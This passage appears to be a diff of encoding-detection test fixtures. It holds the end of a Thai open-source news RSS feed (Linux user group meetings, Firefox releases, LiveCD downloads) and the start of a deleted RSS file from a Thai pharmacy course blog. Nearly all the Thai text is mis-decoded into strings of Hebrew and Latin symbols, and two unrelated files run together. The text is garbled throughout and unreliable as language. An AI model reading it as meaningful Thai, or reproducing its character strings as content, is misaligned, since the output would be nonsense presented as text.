הַי¾װ¨ֳׂ³ׂד¹¡ֳֽׂ÷ֱֳ₪ֳׁי§ֻ¹יׂ·ױט¨׀¨ׁ´ד¹»ֳ׀א·ָה·ֲµטֽה» - - -«װ»יׂ-א¹₪א·₪-«ׁ¹ ¨ׁ÷ֱ׳ֽא»װ´µַׁגֽא¾¹ֽֽ¿¿װָ´חֽ·ֽחֽ¡ 2.0 -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=283 -אֱ׳טַֽׁ¹·ױט 18 µ״ֵׂ₪ֱ 2548 «װ»יׂ ֳטֱַ¡ׁ÷א¹₪א·₪ בֵ׀÷ֳװֹׁ·«ׁ¹הֱג₪ֳ«װאµחֱ»ֳ׀א·ָה·ֲ ה´י¨ׁ´§ׂ¹ב¶ֵ§¢טַׂא»װ´µַׁגֽא¾¹ֽֽ¿¿װָ´חֽ·ֽחֽ¡ 2.0 «ײט§·ׁי§ֱֽׂ§₪ל¡ֳה´יֱױטַ¹ֳטֱַד¹¡ֳׂ¾ׁ²¹ׂבֵ׀¼ֵׁ¡´ׁ¹דֻיֱױ₪ֱֱֳַׂׂׂ¶´יׂ¹ְֹׂׂה·ֲ·ױט¾ֳיֱֽד×י§ׂ¹ה´י·ׁ¹·ױ§ׂ¹ב¶ֵ§¢טַׂ₪ֳׁי§¹ױי ¡חא»ח¹¡ֳׂ×ױי·װָ·ׂ§ֲֽטׂ§×ׁ´א¨¹ַטׂ ·ׁי§ֱֽׂ§₪ל¡ֳ¨׀ג»ֳגֱ··ױטב÷ֳ¹´לא´ױֲַ ₪׳ֽגֽא¾¹ֽֽ¿¿װָ´חֽ·ֽחֽ¡ «ײט§ֽׁ¹·ױט¨ֳװ§בֵיַ א¹₪א·₪-«װ»יׂ בֵ׀«ׁ¹ ה´יֳטֱֱַ׳ֽ¡ׁ¹¡׃ֻ¹´·װָ·ׂ§¹ױיהַיא¡׳ֽ÷ֻ¹ײט§»ױבֵיַ בµטֲׁ§הֱטא₪ֲ¨ׁ´§ׂ¹»ֳ׀×ֱׁׂ¾ׁ¹¸לדֻיְֲׂ¹ֽ¡ה´י·ֳׂ÷¡ׁ¹ - - -·״¹ֽ÷ֱֳ Open Source Training The Trainer -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=282 -Center for International Cooperation for Computerization (CICC), ׃¹ׁ¡§ׂ¹װ§₪לג»ֳל ¨ׁ´ֽ÷ֱֳ Open Source Training The Trainer ׃ֳֻׁ÷¡ֵ״טֱ»ֳ׀א·ָד¹ב¶÷אֽא×ױֲµ׀ַׁ¹ֽֽ¡א©ױֲ§דµיבֵ׀אֽא×ױֲדµי «ײט§₪ֳׁי§¹ױיא»ח¹₪ֳׁי§·ױט 3 ¢ֽ§¡ֳׂ¨ׁ´§ׂ¹ ג´ֱֲױ¡׃ֻ¹´¨ׁ´¢ײי¹·ױט University of Colombo School of Computing »ֳ׀א·ֳָָױֵׁ§¡ׂ ֳ׀ַֻטׂ§ַׁ¹·ױט 5 - 9 ¸ׁ¹ַׂ₪ֱ 2548 - - -¢ֽא×װ­ֳטֱֱֱַׁ¹ׂ TLUG ₪ֳׁי§·ױט 8 -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=281 -ֱֱׁ¹ׂ TLUG ₪ֳׁי§·ױט 8 ד¹ֽ§ֳ×ׂµװ ·ׁי§גֽא¾¹«ֳֽל÷¹ַװ¹ג´ַל בֵ׀ VoIP server ד¹ַֻׁ¢יֽ -1) Chantra 1.0 - «ױ´ױֱֳַ«ֽ¿µלבֳַלגֽא¾¹«ֳֽל׃ֳֻׁ÷ַװ¹ג´ַל : ג´ֲ₪״³ֱׁ¾ׁ¹¸ל ֳ׀ֳ׳ט¹ֱֲֳל ÷ֳװֹׁ·גֽא¾¹«ֳֽל´װאֵַֽ»אֱ¹µל -2) Open Source IP-PBX בֵ׀ CRM : ג´ֲ₪״³ג´ֱ א¨ֳװ­ֲָ - - -בֵ»·חֽ» 100 ´ֵֵֽל א·₪ג¹גֲֵױא¾׳טֽא´ח¡ -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=280 -₪ֱֽ¾װַאµֳֽלבֵ»·חֽ»ֳׂ₪ׂ 100 אֳֻױֲ­ֳֻׁ° ¼ֵ§ׂ¹¡ֳׂ¾ׁ²¹ׂ¨ׂ¡¹ׁ¡ַװ¨ֲׁ¢ֽ§¶ׂ÷ׁ¹אֽחֱהֽ·ױ ֳֻׁ°ֽאֱֳװ¡ׂ ַֻׁ§¹ׁ÷¹״¹דֻיא´ח¡ד¹»ֳ׀א·ָ¡׃ֵׁ§¾ׁ²¹ׂה´יד×יא»װ´גֵ¡·ָׁ¹ל ֳֽ§ֳׁ÷¡ֳׂא×׳טֱֽµטֽהַ-ה¿ ֻ¹״¹ֳׁ°÷ֵׂ»ֳ׀א·ָ¡׃ֵׁ§¾ׁ²¹ׂ«׳יֽבֵ׀ב¨¡¨טֲׂדֻיא´ח¡ד¹¾׳י¹·ױטֻטׂ§ה¡ֵד×י בֱיהֱטֱױה¿¿יׂ¡ח·׃§ׂ¹ה´י א¾ֳׂ׀ֱױֳ׀÷÷ב÷µאµֳֽױטה¢ֵׂ¹ - - -´ײ§א§װ¹ ֱֽֽװ¹-¡ֽ§ֵׂ¡ֿ ֽׁ´©ױ´¹ׁ¡¾ׁ²¹ׂ«ֽ¿µלבֳַלה·ֲ -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=279 -¹ֲֳֳֳֽׂ¶ ¡ֵװט¹»ֳ׀·״ֱ ֳׁ°ֱ¹µֳױַטׂ¡ֳׂ¡ֳ׀·ֳַ§א·₪ג¹גֲֵױֳׂ¹א·ָבֵ׀¡ֳׂ׳טֳֽׂ ֳֻ׳ֽ הֽ«ױ·ױ ¡ֵטַַׂטׂ ¨ׂ¡¹גֲ÷ֲׂ¢ֽ§ֳׁ°÷ֵׂ ·ױטµיֽ§¡ֳׂדֻי׃¹ׁ¡§ׂ¹ט§אֳװֱֽ״µֻׂ¡ֱֳֳ«ֽ¿µלבֳַלבֻט§×ׂµװ ֳֻ׳ֽ «װ»יׂ ׁ§¡ׁ´¡ֳ׀·ֳַ§הֽ«ױ·ױא»ח¹א¨יְׂׂ¾ד¹¡ֳׂט§אֳװֱ¹ׁ¡¾ׁ²¹ׂ«ֽ¿µֳלבֳַל₪¹ה·ֲ דֻיא»ח¹א¨יׂ¢ֽ§¡װ¨¡ֳׂבֵ׀¼ֵׁ¡´ׁ¹דֻיטַ¹ֳׂסֳׂµטׂ§ז ד×י«ֽ¿µלבֳַל¢ֽ§ה·ֲ¹ׁי¹ ¢³׀¹ױי ¡ֳ׀·ֳַ§הֽ«ױ·ױה´יֱֽ÷ֱֲֻׂדֻי«װ»יׂה»¨ׁ´·׃ב¹ַ·ׂ§·ױט×ׁ´א¨¹בֵיַ - - -אֽ¡×¹א»װ´גֽ¡ׂבֵ׀¼יד×יא»װ´ד¨ ₪׳ֻֽ¹·ׂ§´ד×טֲַגֽא¾¹«ֳֽל -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=278 -אֳ׳טֽ§·ױטא»ח¹»ׁ­ֻׂדֻי¡ׁ÷₪¹גֽא¾¹«ֳֽל µיֽ§»ַ´ַֻׁד¹אֵַׂ¹ױי ₪׳ֽ &#8220;גֽא¾¹«ֳֽלא»ח¹¢ֽ§¿ֳױ&#8221; - -¡ֳ³ױ¹ױי ֽׂ¨א»ח¹ׂאֻµ״ֻ¹ײט§·ױט·׃דֻי¡ֳׂ¾ׁ²¹ׂגֽא¾¹«ֳֽלהֱטב¾ֳטֲֵֻׂ ֳֻ׳ֽה´יֳׁ÷₪ֱַׂ¹ד¨¨ׂ¡¹ׁ¡¾ׁ²¹ׂ ג´ֱֲֽ§¡ׁ¹ַטׂגֽא¾¹«ֳֽל¾ׁ²¹ׂה»¡חהֱטא¡װ´ֲֳׂה´יא»ח¹¡ֽ÷א»ח¹¡׃ ֳֻ׳ֽבֱי¾ׁ²¹ׂ¢ײי¹ֱׂ ₪¹·ׁטַה»¡חהֱטדֻי₪ֱַׂ¹ד¨·ױט¨׀ד×י§ׂ¹ ·ױט¡ֵטֱַׂׂ¶׳ֽא»ח¹ֽ״»ֳֳ₪׃₪ׁ­ד¹¡ֳׂט§אֳװֱ¡ֳׂד×י«ֽ¿µלבֳַל א¹׳טֽ§¨ׂ¡¼יד×י§ׂ¹טַ¹ֱׂ¡×װ¹×ׂ¡ׁ÷¡ֳׂד×י§ׂ¹«ֽ¿µלבֳַל׃אֳח¨ֳ»¨ׂ¡µטׂ§»ֳ׀א·ָ הֱט¹װֱֲ·ױט¨׀א¢ױֲ¹«ֽ¿µלבֳַל¢ײי¹ד×יאֽ§ֱׂ¡¹ׁ¡ ג´ֲֳׂ₪ׂ¢ֽ§«ֽ¿µלבֳַל«׳יֽד×י¡ח¶¡¡ַטֱׂׂ¡אֱ׳טֽא·ױֲ÷¡ׁ÷ ¡ֳׂµיֽ§¨יׂ§¹ׁ¡¾ׁ²¹ׂא¢ױֲ¹ בֵ׀ ֲׁ§ֱױ¡ֳׂד×י§ׂ¹§טֲׂ ֽױ¡·ׁי§´ֱױ₪״³ְׂ¾ֱׂ¡¡ַטׂד×יגֽא¾¹«ֳֽלֽױ¡´יֲַ - - -ֱֱׁ¹ׂ TLUG#7 »ֳ׀¨׃א´׳ֽ¹¡ׁ¹ֲֲׂ¹ -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=277 -¢ֽא×װ­ֳטֱֱֱַׁ¹ׂ "Thai Linux User Group (TLUG)" ₪ֳׁי§·ױט 7 »ֳ׀¨׃א´׳ֽ¹¡ׁ¹ֲֲׂ¹ 2548 ד¹ַֻׁ¢יֽ -1. "Software Bank", ַװ·ֲׂ¡ֳ ₪״³״ֳװ×ׂµװ ֱִׁ·¸װל -2. "Defending your Linux box", ַװ·ֲׂ¡ֳ ₪״³ֱ¾ֵ ÷״­¨ֳװ§ - -ד¹ַׁ¹אֳׂל·ױט 17 ¡.ֲ. 2548 אֵַׂ 13.00-16.00 ¹. -³ ֻיֽ§»ֳ׀×״ֱ ICT Learning center, ×ׁי¹ 6 Central world Plaza -¨ׁ´ג´ֲ ָ¹ֲלא·₪ג¹גֲֵױֽװאֵח¡·ֳֽ¹װ¡לבֵ׀₪ֱֽ¾װַאµֳֽלבֻט§×ׂµװ -בֵ׀ ׃¹ׁ¡§ׂ¹ט§אֳװֱֽ״µֻׂ¡ֱֳֳ«ֽ¿µלבֳַלבֻט§×ׂµװ -ֵ§·׀א÷ױֲ¹א¾׳טֽא¢יֳׂטֱֱֱַׁ¹ׂה´י·ױט http://lug.opentle.org - - - -»ֳ׀¡ָׂב¨י§אµ׳ֽ¹×טֽ§גַֻט¢ֽ§ Mozilla Firefox 1.0.6 -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=276 -ֲֳׂ§ׂ¹ֲ׳¹ֲׁ¹אֱ׳טַֽׁ¹·ױט 9 ¡ׁ¹ֲֲׂ¹¨ׂ¡·ױֱ§ׂ¹¾ׁ²¹ׂאַח÷÷ֳַׂא«ֳֽל Firefox ¨ׂ¡ Mozilla.org ַטׂ¼ֵ¡ֳ׀·÷¨ׂ¡×טֽ§גַֻט·ױטא¡װ´¢ײי¹¨ׂ¡¡ֳׂד×י§ׂ¹ IDN ¡טֽדֻיא¡װ´¡ֳׂ»¯װא¸¡ֳׂ÷ֳװ¡ֳׂבֵ׀ֱֳׂׂ¶ֽ¹״­ׂµדֻי¼י÷״¡ֳ״¡ֱֳׂׂ¶ֳׁ¹₪׃ׁט§¨ׂ¡ֳ׀ֲ׀ה¡ֵה´י - - -¢ֽא×װ­ֳטֱֱֱַׁ¹ׂ TLUG#6 »ֳ׀¨׃א´׳ֽ¹װ§ֻׂ₪ֱ -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=275 - ¢ֽא×װ­ֳטֱֱֱַׁ¹ׂ "Thai Linux User Group (TLUG)" ₪ֳׁי§·ױט 6 »ֳ׀¨׃א´׳ֽ¹װ§ֻׂ₪ֱ 2548 ַֻׁ¢יֽ "¡ֳׂ¾ׁ²¹ׂ Web-based Application ´יֲַ Open Source Software" ¼י÷ֲֲֳֳׂ ´ֳ. ַװ״·¸װל ב«טµׁי§ ¼י¨ׁ´¡ֳׂג₪ֳ§¡ֳׂ¾ׁ²¹ׂ«ֽ¿µלבֳַל ÷ֳװֹׁ· הֱג₪ֳאֽח¡«ל ¨׃¡ׁ´ - - -ֱֱׁ¹ׂ "Thai Linux User Group (TLUG)" ₪ֳׁי§·ױט 5 -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=274 -¢ֽא×װ­ֳטֱֱֱַׁ¹ׂ "Thai Linux User Group (TLUG)" ₪ֳׁי§·ױט 5 »ֳ׀¨׃א´׳ֽ¹¡ֳ¡®ׂ₪ֱ 2548 ד¹ַֻׁ¢יֽ "Message Translation" ַװ·ֲׂ¡ֳ ₪״³¡׃¸ֳ ה¡ֳֳׁ¡ֹל - - -¢ֽא×װ­ֳטֱֱֱַׁ¹ׂ TLUG#4 -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=273 -¢ֽא×װ­ֳטֱֱֱַׁ¹ׂ "Thai Linux User Group (TLUG)" ₪ֳׁי§·ױט 4 »ֳ׀¨׃א´׳ֽ¹ֱװ¶״¹ֲׂ¹ 2548 ד¹ַֻׁ¢יֽ -1. "Character and Font --- know it, create it", ַװ·ֲׂ¡ֳ ₪״³¾ְֵֵׂ ַױֳ׀¸¹ׂ÷״µֳ -2. "Diskless linux with LTSP", ַװ·ֲׂ¡ֳ ₪״³¡ֳװ× ¹ׂװ§ֻל¢ׁ¹¸ל - - -TLELiveCD 7.0.1 ׃ֳֻׁ÷¡ֳׂ·´ֽ÷ -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=272 -ֽיׂ§¶ײ§ ÷ׁ¹·ײ¡¡ֳׂ¾ׁ²¹ׂ ¢³׀¹ױי·ׂ§·ױֱ¾ׁ²¹ׂה´יֽֽ¡µַׁ·´ֽ÷ב¼ט¹ LiveCD ¢ֽ§ LinuxTLE ֳ״ט¹ 7.0.1 ·טׂ¹ֱֳׂׂ¶ Download א¾׳טֽ·´ֽ÷ד×י§ׂ¹ֵ׀ֲֳׂ§ׂ¹¢יֽ¼װ´¾ֵׂ´ֱֲׁׂ§·ױֱ§ׂ¹ה´י₪ֳׁ÷ בֵֻט§ Download ֱױֽ§·ױט₪׳ֽ -- ftp.opentle.org -- ftp.nectec.or.th - - - -¿ֳױבֳַל ב¾׀ֳׁ÷÷ׂ» ¡ֵ״טֱ¸״ֳ¡װ¨ֻׂ¡װ¹ֻ¹טֲַ§ׂ¹ֳׁ° -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=271 -¾ׂ´ַֻׁ בֵ´ֻ¹ׁ¡ בµט₪§הֱטא¡װ¹אֲֵ ¨ׂ¡¢טַׂ¡ֳ״§א·¾הֽ·ױאֱ׳טֽ 29-4-48 - -אֽ·ױאֽהֽ גֲַ¹גֲ÷ֲׂט§אֳװֱֽ״µֻׂ¡ֱֳֳהֱט₪׳÷ א¼×װ­»ׁ­ֻׂ«י׃«ׂ¡ֳׁ°ב¨¡«ֽ¿µלבֳַלב¢ט§אֽ¡×¹ - - -¢ֽא×װ­ֳטֱֱֱַׁ¹ׂ TLUG#3 -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=270 -¢ֽא×װ­ֳטֱֱֱַׁ¹ׂ "Thai Linux User Group (TLUG)" ₪ֳׁי§·ױט 3 »ֳ׀¨׃א´׳ֽ¹¾ְִֹׂ₪ֱ ד¹ַֻׁ¢יֽ "Linux Distro Review" ₪״ֲאֳ׳טֽ§ֵװ¹״¡«ל´װ·ֳװ÷װַ×ׁ¹µטׂ§ ז ַטׂבµטֵ׀₪טֱֲׂױ¢יֽ´ױֲֽטׂ§הֳ - - -Red Hat Enterprise Linux 4 -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=269 -÷·₪ֱַׂ¢ֽ§₪״³ֽװֳװֲ׀ ה¾ֳױ¾טֲִׂ·¸װל אֵטׂ¶ײ§§ׂ¹א»װ´µַׁ Red Hat Enterprise Linux (RHEL) אֳַֽל×ׁט¹ 4 ׃ֳֻׁ÷ְֱװְׂ₪אֽא×ױֲב»«װ¿װ¡ ׃ֳֻׁ÷ד¹אֱ׳ֽ§ה·ֲ¨ׁ´¢ײי¹ַׁ¹·ױט 21 אֱֲֹׂ¹ ·ױטגֳ§בֱֳ InterContinental Bangkok א»ח¹¡ֳׂב´§¶ײ§א»יֱֲֻׂׂ¢ֽ§÷ֳװֹׁ· Red Hat ַטׂµיֽ§¡ֳׂ¡װ¹µֵׂ´ֽ§₪ל¡ֳ»ֳ׀א·ָה·ֲֲֽטׂ§¨ֳװ§¨ׁ§ - - -×״ֱ×¹₪¹גֽא¾¹«ֳֽלא»ח¹¨ֳװ§ה´י ¶יֳׂטֱַ¡ׁ¹ֵ§ֱ׳ֳֽיׂ§ֲֽטׂ§¨ֳװ§¨ׁ§ -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=268 -א¹₪א·₪ בֵ׀ «װ»יׂ ה´יֳטֱַ¡ׁ÷¨ׁ´§ׂ¹ֱֱׁ¹ׂ "¡ֳׂט§אֳװֱ«ֽ¿µלבֳַלגֽא¾¹«ֳֽלד¹»ֳ׀א·ָה·ֲ" אֱ׳טַֽׁ¹·ױט 28 ֱױ.₪. ·ױט¼טׂ¹ֱׂ ג´ֲ§ׂ¹₪ֳׁי§¹ױיֱױ¡ֵ״טֱ¼י·ױט¹ד¨«ֽ¿µלבֳַלגֽא¾¹«ֳֽל ·ׁי§ֳ׀´ׁ÷¡ֵ״טֱ¼יד×י ¹ׁ¡¸״ֳ¡װ¨אֽ¡×¹ ¡ֵ״טֱ¹ׁ¡¾ׁ²¹ׂג»ֳב¡ֱֳ בֵ׀¡ֵ״טֱ¼י´בֳֵ׀÷÷ ¡ַטׂ 500 ₪¹א¢יֳׂטֱַ§ׂ¹ א¾׳טֳֽׁ÷¿ׁ§¡ֳׂ÷ֲֲֳֳׂ¨ׂ¡ַװ·ֲׂ¡ֳ¼י₪ֳט׃ַֻֽ´ד¹ַ§¡ֳׂגֽא¾¹«ֳֽל ֽׂ·װ ´ֳ.ַװֳׁ× ֳָאֵװֵָי׃ַׂ³װ× ¹ֲׂ´¹״¾ֵ ֱֲֵַׂׂׂ בֵ׀¹ֲׂאֳױ ×װג¹´ֱ א»ח¹µי¹ - - -ֱֳַ¾ֵ₪¹גֽא¾¹«ֳֽל ֻׂ·װָ·ׂ§¾ׁ²¹ׂ·ױטאֱֻׂ׀ֱ -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=267 -¹ֲׂא¨ֱל ₪ֳֵׂל₪ ¼י¨ׁ´¡ֳׂ½טֲׂ¾ׁ²¹ׂגֽא¾¹«ֳֽל ׃¹ׁ¡§ׂ¹ט§אֳװֱֽ״µֻׂ¡ֱֳֳ«ֽ¿µלבֳַלבֻט§×ׂµװ ֽ§₪ל¡ֳׂ (ֱֻׂ×¹) ֳֻ׳ֽ «װ»יׂ ¡ֵטַׂד¹§ׂ¹ֱֱׁ¹ׂ "¡ֳׂט§אֳװֱ«ֽ¿µלבֳַלגֽא¾¹«ֳֽלד¹»ֳ׀א·ָה·ֲ" ַטׂ ¡ֳׂ¨ׁ´ֱֱׁ¹ׂ₪ֳׁי§¹ױי ¹ׁ÷א»ח¹¡ֳֳַׂ÷ֱֳַ×״ֱ×¹גֽא¾¹«ֳֽל₪ֳׁי§דֻ­ט·ױט״´₪ֳׁי§ֻ¹ײט§ ג´ֲא¡װ´¨ׂ¡₪ֱֳַׂטֱֱַ׳ֽ¡ׁ¹ֳ׀ַֻטׂ§ «װ»יׂ בֵ׀ ָ¹ֲלא·₪ג¹גֲֵױֽװאֵח₪·ֳֽ¹װ¡לבֵ׀א·₪ג¹גֲֵױבֻט§×ׂµװ ֳֻ׳ֽ א¹₪א·₪ א¾׳טֽב¨י§דֻיב¡ט₪¹הֽ·ױ·ֳׂ÷ַטׂ ב¹ַ·ׂ§¡ֳׂט§אֳװֱגֽא¾¹«ֳֽל ¢ֽ§ה·ֲ¨׀¢ׁ÷א₪ֵ׳טֽ¹ה»ד¹·װָ·ׂ§ד´ בֵ׀ֱױג₪ֳ§¡ֳֽׂ׀הֳ÷יׂ§·ױט¡׃ֵׁ§¨׀א¡װ´¢ײי¹ - - -א×װ­א¢יֳׂטֱֱֱַׁ¹ׂ "¡ֳׂט§אֳװֱ«ֽ¿µלבֳַלגֽא¾¹«ֳֽלד¹»ֳ׀א·ָה·ֲ" -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=266 -׃¹ׁ¡§ׂ¹ט§אֳװֱֽ״µֻׂ¡ֱֳֳ«ֽ¿µלבֳַלבֻט§×ׂµװ (ֽ§₪ל¡ֱֳֻׂׂ×¹) ֳֻ׳ֽ«װ»יׂ ֳטֱַ¡ׁ÷ָ¹ֲלא·₪ג¹גֲֵױֽװאֵח¡·ֳֽ¹װ¡לבֵ׀₪ֱֽ¾װַאµֳֽלבֻט§×ׂµװ (א¹₪א·₪) ¨ׁ´§ׂ¹ֱֱׁ¹ׂד¹ַֻׁ¢יֽ "¡ֳׂט§אֳװֱ«ֽ¿µלבֳַלגֽא¾ט¹«ֳֽלד¹»ֳ׀א·ָ" ַׁ¹·ױט 28 ֱױ¹ׂ₪ֱ 2548 אֵַׂ 08.30 - 17.00 ¹. ³ גֳ§בֱֱֲֳׂ«װµױי (¶¹¹ֳָױֲֽ״¸ֲׂ) -¼י¹ד¨ֱֳׂׂ¶´ֲֳֵׂ׀אֽױֲ´¡׃ֻ¹´¡ֳׂ בֵ׀ֵ§·׀א÷ױֲ¹ֽֽ¹הֵ¹ל µׁי§בµט÷ׁ´¹ױיא»ח¹µי¹ה» - - -Anti-mosquitos run on linux -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=265 -ג»ֳב¡ֱֳהֵטֲ״§ אֳַֽל×ׁט¹דֱֻטֵטׂ״´ 3.3 ¢ֽ§ ₪״³ֳָׁ³ֲ ÷״³ֲֳׁµ¾ׁ¹¸״ל ¨ׂ¡ ÷ֳװֹׁ· «ױ ֱֽ ג«ֵ×ׁט¹ ¨׃¡ׁ´ (Sea Mos Solution Co.,Ltd) - -₪ֱֱֳַׂׂׂ¶¾װאָֹ¢ֽ§ֱׁ¹¡ח₪׳ֽ ֱׁ¹ֱֳׂׂ¶·ױט¨׀הֵטֵ¡¹י׃ה´י ֱֳׂׂ¶ד×י§ׂ¹÷¹ֵװ¹״¡«לה´י - - - -ב¹׀ ד×י "Mozilla Firefox" אֵט¹א¹חµ ב¡י»ׁ­ֻׂ ֳיגַֻט¢ֽ§÷ֳַׂא«ֳֽל -http://www.opentle.org/modules.php?op=modload&name=News&file=article&sid=264 -¨ׂ¡אֽ¡ֳׂ¢ֽ§ָ¹ֲל»ֳ׀ׂ¹§ׂ¹¡ֳֳׁׂ¡ֹׂ₪ֱַׂ»ֵֽ´ְֲׁ»ֳ׀א·ָה·ֲ ֳֻ׳ֽ ה·ֲאװֳל· ֳ׀÷״ַטׂ ד¹»ׁ¨¨״÷ׁ¹¼י¼ֵװµג»ֳב¡ֱֳ·טֽ§ֽװ¹א·ֳֽלא¹חµ ֳֻ׳ֽ אַח÷÷ֳַׂא«ֳֽל (Browser) הֱטה´ידֻי₪ֱַׂ׃₪ׁ­ד¹´יׂ¹₪ֱַׂ»ֵֽ´ְֲׁא·טׂ·ױט₪ֳַ ¨ײ§·׃דֻי¼יד×י₪ֱֽ¾װַאµֳֽלµיֽ§א¼×װ­ ₪ֱַׂאױטֲ§µטׂ§ז ¨ׂ¡¼י·ױטהֱט»ֳ׀§₪ל´ױ¹׃×טֽ§גַֻט´יׂ¹₪ֱַׂ»ֵֽ´ְֱֲׁׂד×י ´ׁ§¹ׁי¹ "ֱֽ««װֵטׂ ה¿ֳל¿חֽ¡«ל" ¨ײ§א»ח¹·ׂ§אֵ׳ֽ¡·ױטה´יֳׁ÷¡ֳֽֽׂ¡ב÷÷ֱׂדֻיֱױ₪״³ֱ÷ׁµװ₪ֳ÷¶יַ¹ ÷¹¾׳י¹°ׂ¹´יׂ¹₪ֱַׂ»ֵֽ´ְֲׁµֱׂ·ױט¼יד×י·ׁטַה»µיֽ§¡ֳׂ ¹ֽ¡¨ׂ¡¹ױי ֲׁ§א»ח¹ג»ֳב¡ֱֳֳ׀÷÷א»װ´·ױטהֱטµיֽ§אױֲ₪טׂד×י¨טֲׂד¹¡ֳׂ¹׃ֱׂד×י§ׂ¹ֽױ¡´יֲַ - - - diff --git a/chardet/tests/TIS-620/pharmacy.kku.ac.th.analyse1.xml b/chardet/tests/TIS-620/pharmacy.kku.ac.th.analyse1.xml deleted file mode 100644 index 8b92320..0000000 --- a/chardet/tests/TIS-620/pharmacy.kku.ac.th.analyse1.xml +++ /dev/null @@ -1,195 +0,0 @@ - - - - - - - Analyse1 - http://pharmacy.kku.ac.th/analyse1 - babblings! - Copyright 2004 - Mon, 29 Nov 2004 02:08:40 +0000 - http://wordpress.org/?v=1.2 - - - אֽ¡ֳׂ»ֳ׀¡ֽ÷¡ֳׂאֳױֲ¹ַװ×ׂ ¡ֳַׂװא₪ֳׂ׀ֻלֲׂ1 - http://pharmacy.kku.ac.th/analyse1/index.php?p=197 - http://pharmacy.kku.ac.th/analyse1/index.php?p=197#comments - Tue, 23 Nov 2004 10:02:41 +0000 - - ¢ֽµיֽ¹ֳׁ÷טֲֳַׂװ×ׂ¡ֳַׂװא₪ֳׂ׀ֻלֲׂ 1 http://pharmacy.kku.ac.th/analyse1/index.php?p=197 - ַֻׁ¢יֽאֳ׳טֽ§ ¡ֳׂה·א·ֳµא¡ױטֲַ¡ׁ÷ֳׂ»ֳ׀¡ֽ÷א×װ§«יֽ¹ (Complxometric Titration) - - ֲװ¹´ױµיֽ¹ֳׁ÷א¢יׂטאַח÷א¾¨ ֲֳַׂװ×ׂ¡ֳַׂװא₪ֳׂ׀ֻלֲׂ 1 ד¹ַֻׁ¢יֽאֳ׳טֽ§ ¡ֳׂ¡ֳׂה·א·ֳµא¡ױטֲַ¡ׁ÷ֳׂ»ֳ׀¡ֽ÷א×װ§«יֽ¹ (Complxometric Titration) «ײט§¨ׁ´·׃¢ײי¹׃ֳֻׁ÷¹ׁ¡ָײ¡ֹׂבֵ׀¼י·ױט¹ד¨·ׁטַה»ה´י₪י¹₪ַיׂבֵ׀אֳױֲ¹ֳי´יֲַµ¹אֽ§ ג´ֲ¨׀»ֳ׀¡ֽ÷´יֲַ ַֻׁ¢יֽµטׂ§ז·ױטה´י·׃¡ֳֽׂ¹ד¹ְׂ₪÷ֲֲֳֳׂ·ױט¨ׁ´הַיד¹₪ֱֵֽׁ¹ל·ׂ§´יׂ¹¢ֱַׂ׳ֽ «ײט§¼יאֳױֲ¹ֱֳׂׂ¶א¢יׂה»ָײ¡ֹׂה´יµֱֵׂ׃´ׁ÷ ÷ׂ§ַֻׁ¢יֽ¨׀ֱױ µֳׂׂ§ בֵ׀µֳג₪ֳ§ֳיׂ§»ֳ׀¡ֽ÷א¾׳טֽ·׃דֻיא¢יׂד¨ֱׂ¡ֲװט§¢ײי¹ א¹׳טֽ§¨ׂ¡אַח÷א¾¨¹ױי¼י¨ׁ´·׃ה´י¨ׁ´·׃¢ײי¹א»ח¹₪ֳׁי§בֳ¡ֽׂ¨¨׀ֲׁ§ֱױ¢יֽ÷¡¾ֳטֽ§ֽױ¡ֲֵֻׂ»ֳ׀¡ֳׂ ¢ֽ₪ֱַׂ¡ֳ״³ׂ·טׂ¹¼יא¢יׂאֲױטֱֲ×ֱ¶יׂ¾÷¢יֽ¼װ´¾ֵׂ´»ֳ׀¡ֳׂד´ ×טֲַט§¢יֽא¹ֽב¹׀ֱֲׁׂ§¼י¨ׁ´·׃´יֲַ א¾׳טֽ¨׀ה´י·׃¡ֳׂ»ֳׁ÷»ֳ״§ב¡יה¢ד¹גֽ¡ׂµטֽה»₪ט׀ ¢ֽ¢ֽ÷¾ֳ׀₪״³₪ט׀ - -ֽ. ´ֳ. ״¸ׂװ¹ױ ¾װ×­ַָװ¹ -e-mail: sutpit1@kku.ac.th -ְׂ₪ַװ×ׂאְׁ×א₪ֱױ -₪³׀אְׁ×ָׂµֳל ֱ¢. -¾ִָ¨װ¡ֲׂ¹ 2547 - - - - - - http://pharmacy.kku.ac.th/analyse1/wp-commentsrss2.php?p=197 - - - 8. ב÷÷·´ֽ÷ - http://pharmacy.kku.ac.th/analyse1/index.php?p=198 - http://pharmacy.kku.ac.th/analyse1/index.php?p=198#comments - Tue, 23 Nov 2004 09:58:10 +0000 - - ב÷÷·´ֽ÷ http://pharmacy.kku.ac.th/analyse1/index.php?p=198 - ₪׃¶ֱׂ¡טֽ¹¡ֳׂאֳױֲ¹ֳיֲֳׂ÷״₪₪ֵ - -1. ¡ֳׂה·א·ֳµב÷÷א×װ§«יֽ¹·ױטµיֽ§ֲָֽׁׂ»ׁ¨¨ֲֲֵֻׁׂזֲֽטׂ§¨ײ§·׃דֻי¡ֳַׂװא₪ֳׂ׀ֻלה´י¼ֵ·ױט¶¡µיֽ§בֱט¹ֲ׃ 